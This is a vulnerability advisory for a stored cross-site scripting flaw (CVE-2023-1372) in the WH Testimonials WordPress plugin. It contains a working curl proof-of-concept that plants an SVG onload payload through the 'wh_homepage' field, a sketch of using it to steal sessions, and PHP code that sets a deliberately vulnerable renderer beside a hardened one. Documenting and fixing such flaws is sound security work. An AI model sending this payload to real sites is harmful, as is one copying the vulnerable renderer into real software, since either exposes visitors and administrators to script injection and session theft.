CVE-2023-1372 - WH Testimonials <= 3.0.0 - Unauthenticated Stored Cross-Site Scripting
A stored XSS vulnerability has been identified in the WH Testimonials WordPress plugin. The vulnerable parameter is "wh_homepage", which is submitted via an HTTP POST request to the add testimonial functionality of the plugin.

Introduction
WH Testimonials Plugin v3.0.0 is a popular WordPress plugin used to manage and display testimonials on websites. It provides several features to customize the layout of testimonials. However, a cross-site scripting (XSS) vulnerability has been discovered in the plugin, which can allow an attacker to inject malicious code and execute it in the context of the victim's browser.
Description
The vulnerability is caused by insufficient validation of user-supplied input in the "wh_homepage" POST parameter. An attacker can inject markup into this parameter; it is stored with the testimonial and rendered without output encoding to anyone who views the page on which the testimonial is displayed, including site administrators moderating submissions.
Proof of Concept
curl -X POST 'http://example.com/add/' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
-H 'Host: example.com' \
-d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'
(curl computes the Content-Length header itself from the -d body; every multipart boundary line must match the boundary declared in the Content-Type header exactly.)
Impact
An attacker can exploit this vulnerability to steal sensitive information, such as cookies, session tokens, and other sensitive data. They can also perform unauthorized actions on behalf of the victim, such as modifying the victim's account settings, posting spam, or installing malware.
Exploitation
To exploit the vulnerability, an attacker crafts a request with the payload shown above and sends it to the vulnerable server. The server stores the payload as part of the testimonial, and the injected code executes in the browser of any user whose page renders that testimonial. For example, the attacker can send a phishing email to the victim with a link to the page that displays the testimonial; when the victim opens the link, the injected code executes and the attacker can steal sensitive information.
Mitigation
To mitigate the vulnerability, the plugin developer should validate and sanitize user-supplied input before processing it. They should also implement output encoding to prevent malicious code injection. Additionally, users should keep their plugins and WordPress installation up to date to prevent vulnerabilities from being exploited.
Remediation
The developer should implement input validation and sanitization for all user-supplied input to prevent malicious code injection. The input received in the "wh_homepage" parameter should be sanitized to remove any potentially harmful code, such as script tags or other HTML/JavaScript markup.
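The two fixes named in the Mitigation and Remediation sections (validate the submitted homepage value, and encode every untrusted value for the HTML context it lands in) are shown side by side below in a self-contained PHP script. This is an added example, not code from the WH Testimonials plugin or from the advisory: the array keys mirror the form field names from the proof of concept, the function names are hypothetical, and the WordPress equivalents mentioned in the comments are only noted, not called, so the script runs under a plain php CLI without WordPress loaded.

```php
<?php
// Added example (not the plugin's own code). Field names follow the PoC form;
// render_testimonial_* and validate_homepage are hypothetical names.
declare(strict_types=1);

// Constructed sample input: the advisory's payload placed in the homepage field.
const SAMPLE_TESTIMONIAL = [
    'wh_clientname' => 'First Name',
    'wh_homepage'   => '"><svg/onload=prompt(/XSS/)>',
    'wh_text_short' => 'Short Review',
];

/**
 * Vulnerable pattern: raw user input concatenated into an HTML attribute.
 * The double quote in the payload closes the href attribute and the rest of
 * the value becomes live markup, which is the stored XSS described above.
 */
function render_testimonial_vulnerable(array $t): string
{
    return '<a href="' . $t['wh_homepage'] . '">' . $t['wh_clientname'] . '</a>'
         . '<p>' . $t['wh_text_short'] . '</p>';
}

/**
 * Input validation at save time: accept only absolute http(s) URLs and drop
 * everything else, so a payload is never written to the database. A scheme
 * allowlist is needed on top of FILTER_VALIDATE_URL because that filter does
 * not by itself reject schemes such as javascript:.
 * In WordPress code, esc_url_raw() plus the same scheme check plays this role.
 */
function validate_homepage(string $value): string
{
    $value = trim($value);
    if ($value === '' || filter_var($value, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $value : '';
}

/**
 * Output encoding at render time: each untrusted value is HTML-escaped.
 * ENT_QUOTES encodes both quote characters, so an attribute cannot be closed
 * early even if a bad value slipped past validation. In WordPress code,
 * esc_url() / esc_attr() / esc_html() are the context-specific equivalents.
 */
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_testimonial_hardened(array $t): string
{
    $homepage = validate_homepage($t['wh_homepage'] ?? '');
    $name     = esc($t['wh_clientname'] ?? '');
    // No link at all when the homepage failed validation.
    $link     = $homepage !== ''
        ? '<a href="' . esc($homepage) . '">' . $name . '</a>'
        : $name;
    return $link . '<p>' . esc($t['wh_text_short'] ?? '') . '</p>';
}

// The vulnerable renderer emits the payload verbatim; the hardened one does not.
echo 'vulnerable: ' . render_testimonial_vulnerable(SAMPLE_TESTIMONIAL) . PHP_EOL;
echo 'hardened:   ' . render_testimonial_hardened(SAMPLE_TESTIMONIAL) . PHP_EOL;

// A legitimate homepage survives validation and is emitted with & encoded.
$ok = SAMPLE_TESTIMONIAL;
$ok['wh_homepage'] = 'https://example.com/?ref=wh&x=1';
echo 'legitimate: ' . render_testimonial_hardened($ok) . PHP_EOL;
```

Both layers matter: validation at save time keeps the payload out of the database, and encoding at render time protects the page even if a value arrived through another path (an import, a direct database edit, or an older unvalidated record).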
References
- https://www.cve.org/CVERecord?id=CVE-2023-1372
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wh-testimonials/wh-testimonials-300-unauthenticated-stored-cross-site-scripting